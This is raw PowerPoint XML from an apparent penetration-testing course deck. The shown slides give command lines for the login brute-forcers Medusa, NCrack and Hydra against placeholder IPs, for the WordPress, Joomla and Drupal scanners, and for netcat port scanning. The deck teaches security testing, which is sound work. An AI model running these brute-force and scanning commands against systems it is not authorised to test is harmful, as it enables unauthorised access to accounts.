          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Medusa is a speedy, parallel, and modular, login brute-forcer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List all modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># medusa -d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># medusa -h 10.10.10.10 -u admin -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>password_file.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -M http</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="502571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E699-4C5F-7B4B-8FC0-6324D8876046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NCrack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE2E522C-3C1E-6544-A15E-99CF8CCE3EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ncrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a high-speed network authentication cracking tool. From the Nmap team.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful for SSH, RDP, FTP, Telnet, HTTP(S), POP3(S), IMAP, SMB, VNC, SIP, Redis, PostgreSQL, MySQL, MSSQL, MongoDB, Cassandra, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and OWA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ncrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --user username -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>paasword_file.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://10.10.10.10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10349757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1D55-091B-C745-AF2C-C615CC24C002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hydra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC2C42F-6AF4-A84F-9FD6-57B031468B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network logon password brute force cracker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful against</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Rlogin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, SIP, SMB(NT), SMTP, SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Teamspeak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (TS2), Telnet, VMware-Auth, VNC and XMPP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># hydra -L root  -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>password_file_list.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 10.10.10.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92708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FBFC-0DEE-7F4E-B999-8E831FC1523E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WordPress Scanner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FF22059-8900-EF4A-B00E-A206AFDB20A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WPScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scans WordPress sites for themes, plugins, users and vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wpscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://wordpress-site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ap,at,tt,cb,dbe,u,m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pass_list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24271314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1F3E-8E9D-BF49-AF05-0A9D8BE91605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Joomla Scanner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87ECA1AE-54BE-B843-BB1E-7A9C008C520F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan Joomla web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not part of default Kali toolset, install using apt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>joomscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>joomscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>joomla</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18397764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C7D7-61E9-3946-A85D-1CA8DB6E5943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drupal Scanner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD60C097-3D8D-004C-88A0-D3D6A86CBFEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan Drupal web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not part of default kali tools, Install:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/droope/droopescan.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>droopescan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># apt install python-pip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># pip install -r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>requirements.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>droopescan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://drupal-site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -e a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4221970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EA21F-7BED-AE4C-9405-DE016C9F12A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34780FEF-1ADE-6345-8FEC-526EF7CE1B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan for open TCP ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w1 -z 10.10.100.1 20-1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan for open UDP ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w1 -u 10.10.100.1 53-1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-h display help for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-n numeric-only IP addresses, no DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-v verbose [use twice to be more verbose]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-w timeout for connects and final net reads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-z zero-I/O mode [used for scanning]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868016880"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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3654</TotalTime>
  <Words>6871</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:10)</PresentationFormat>
  <Paragraphs>927</Paragraphs>
  <Slides>87</Slides>
  <Notes>60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87</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="91" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Horizon</vt:lpstr>
      <vt:lpstr>Introduction to Hacking</vt:lpstr>
      <vt:lpstr>Permission</vt:lpstr>
      <vt:lpstr>Useful Links</vt:lpstr>
      <vt:lpstr>Basic Security – Do The Needful</vt:lpstr>
      <vt:lpstr>Workflow</vt:lpstr>
      <vt:lpstr>TheHarvester</vt:lpstr>
      <vt:lpstr>Recon-ng OSINT</vt:lpstr>
      <vt:lpstr>Recon-ng OSINT</vt:lpstr>
      <vt:lpstr>Netcat - Discovery</vt:lpstr>
      <vt:lpstr>Netcat - Output</vt:lpstr>
      <vt:lpstr>Netcat – Bash Loop</vt:lpstr>
      <vt:lpstr>Netcat – Bash Loop Improved </vt:lpstr>
      <vt:lpstr>Nmap</vt:lpstr>
      <vt:lpstr>Nmap - Output</vt:lpstr>
      <vt:lpstr>Nmap – Common Switches</vt:lpstr>
      <vt:lpstr>SMB Discovery - nbtscan</vt:lpstr>
      <vt:lpstr>SMB Discovery - rpcclient</vt:lpstr>
      <vt:lpstr>SMB Discovery - Nmap</vt:lpstr>
      <vt:lpstr>SMB Discovery – Nmap SMB script</vt:lpstr>
      <vt:lpstr>SMB Discovery – Enum4linux</vt:lpstr>
      <vt:lpstr>SNMP Discovery - Nmap</vt:lpstr>
      <vt:lpstr>SNMP OIDs</vt:lpstr>
      <vt:lpstr>SNMP Discovery - SNMPWalk</vt:lpstr>
      <vt:lpstr>SNMP Discovery - SNMPEnum</vt:lpstr>
      <vt:lpstr>FTP</vt:lpstr>
      <vt:lpstr>SMTP</vt:lpstr>
      <vt:lpstr>Vulnerability Scanning – Nmap</vt:lpstr>
      <vt:lpstr>Vulnerability Scanning – Nmap</vt:lpstr>
      <vt:lpstr>Vulnerability Scanning – Nmap</vt:lpstr>
      <vt:lpstr>DNS Records</vt:lpstr>
      <vt:lpstr>DNS - host</vt:lpstr>
      <vt:lpstr>DNS - host</vt:lpstr>
      <vt:lpstr>DNS - host</vt:lpstr>
      <vt:lpstr>DNS - dig</vt:lpstr>
      <vt:lpstr>DNS - dnsrecon</vt:lpstr>
      <vt:lpstr>DNS - dnsenum</vt:lpstr>
      <vt:lpstr>DNS - nslookup</vt:lpstr>
      <vt:lpstr>Whois - IP</vt:lpstr>
      <vt:lpstr>Whois – Domain Name</vt:lpstr>
      <vt:lpstr>Whois Via Telnet</vt:lpstr>
      <vt:lpstr>Man Pages and Apropos</vt:lpstr>
      <vt:lpstr>Banner Grabbing – Telnet</vt:lpstr>
      <vt:lpstr>Telnet – WebPages</vt:lpstr>
      <vt:lpstr>Banner Grabbing - Curl</vt:lpstr>
      <vt:lpstr>BIGIP – Information Disclosure</vt:lpstr>
      <vt:lpstr>Useful Curl Arguments</vt:lpstr>
      <vt:lpstr>Vulnerability Databases</vt:lpstr>
      <vt:lpstr>Exploit DB</vt:lpstr>
      <vt:lpstr>Nikto</vt:lpstr>
      <vt:lpstr>Cewl</vt:lpstr>
      <vt:lpstr>gobuster</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Dirbuster</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Dirb</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Burp Suite - Setup</vt:lpstr>
      <vt:lpstr>Browse Web Application </vt:lpstr>
      <vt:lpstr>Spider – Gobuster With Proxy Through Burp Suite</vt:lpstr>
      <vt:lpstr>Headers – Root Of Site</vt:lpstr>
      <vt:lpstr>Browse HTML, JS, CSS Files</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Browse Interesting files</vt:lpstr>
      <vt:lpstr>Browse Config.inc </vt:lpstr>
      <vt:lpstr>Fuzzing</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Examples</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Local File Inclusion LFI</vt:lpstr>
      <vt:lpstr>Remote File Inclusion RFI</vt:lpstr>
      <vt:lpstr>SQLMap</vt:lpstr>
      <vt:lpstr>Burp CO2 Plugin</vt:lpstr>
      <vt:lpstr>Burp Notes Plugin</vt:lpstr>
      <vt:lpstr>Impacket – Stand Alone SMB server</vt:lpstr>
      <vt:lpstr>Python Modules</vt:lpstr>
      <vt:lpstr>Hash Identifiers</vt:lpstr>
      <vt:lpstr>Cracking Hashed Passwords</vt:lpstr>
      <vt:lpstr>Medusa</vt:lpstr>
      <vt:lpstr>NCrack</vt:lpstr>
      <vt:lpstr>Hydra</vt:lpstr>
      <vt:lpstr>WordPress Scanner</vt:lpstr>
      <vt:lpstr>Joomla Scanner</vt:lpstr>
      <vt:lpstr>Drupal Scanner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Penetration Testing</dc:title>
